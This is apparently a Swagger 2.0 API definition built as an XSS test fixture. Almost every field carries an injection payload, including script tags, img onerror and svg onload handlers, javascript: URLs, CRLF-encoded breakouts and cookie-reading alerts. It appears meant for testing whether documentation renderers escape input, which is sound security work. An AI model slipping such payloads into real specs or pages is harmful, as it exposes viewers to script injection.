swagger: "2.0"
info:
  description: "xss: <img src=x onerror=\"javascript:alert(1)\">"
  title: "<img src=1 onerror='javascript:alert(document.domain)'>"
  version: "1.0><script>alert(1)</script>"
  x-xss-protection: "0"
  termsOfService: "javascript:alert(1)//"
  contact:
    email: "test@example.com\"><marquee>demo</marquee>"
    name: "Support%0a%0d\"><script>alert(1)</script>"
    url: "https://example.com%0a%0d\"><h1>demo</h1>"
externalDocs:
  description: "<svg/onload=alert(document.cookie)>"
  url: "javascript:alert(document.domain)%0a%0d\"><script>alert(1)</script>"
host: "example.com\"><img src=x onerror=alert(1)>"
basePath: "/v2\"></script><script>alert(1)</script>"
schemes:
- "https"
- "http%0a%0d\"><h1>demo</h1>"
paths:
  /pet:
    post:
      tags:
      - "pet\"onmouseover=\"alert(1)"
      - "tag\"><marquee>demo</marquee>"
      - "tag%0a%0d\"><script>alert(1)</script>"
      summary: "<img src=x onerror=alert(document.domain)>"
      description: "Add a new pet to the store%0a%0d\"><h1>demo</h1>"
      operationId: "addPet\"><marquee>demo</marquee><script>alert(1)</script>"
      consumes:
      - "application/xml"
      - "application/json%0a%0d\"><script>alert(1)</script>"
      produces:
      - "application/xml"
      - "text/html%0a%0d\"><h1>demo</h1>"
      parameters:
      - in: "body"
        name: "body\"><img src=1 onerror='alert(1)'>"
        description: "Pet object that needs to be added to the store\"><marquee>demo</marquee>%0a%0d\"><script>alert(1)</script>"
        required: true
        schema:
          $ref: "#/definitions/Pet"
      responses:
        "405":
          description: "Invalid input<script>alert(1)</script>%0a%0d\"><h1>demo</h1>"
        "200":
          description: "Success\"><marquee>demo</marquee>"
definitions:
  Pet:
    type: "object"
    required:
    - "name%0a%0d\"><script>alert(1)</script>"
    properties:
      id:
        type: "integer"
        format: "int64%0a%0d\"><h1>demo</h1>"
      name:
        type: "string"
        example: "\"><marquee>demo</marquee>%0a%0d\"><script>alert(1)</script>"
      status:
        type: "string"
        description: "pet status in the store<img src=x onerror=alert(document.cookie)>"
        enum:
        - "available\"><marquee>demo</marquee>"
        - "pending%0a%0d\"><h1>demo</h1>"
        - "sold%0a%0d\"><script>alert(1)</script>"
    xml:
      name: "Pet\"><marquee>demo</marquee><script>setTimeout(function(){alert('Delayed XSS')},1500)</script>%0a%0d\"><h1>demo</h1>"
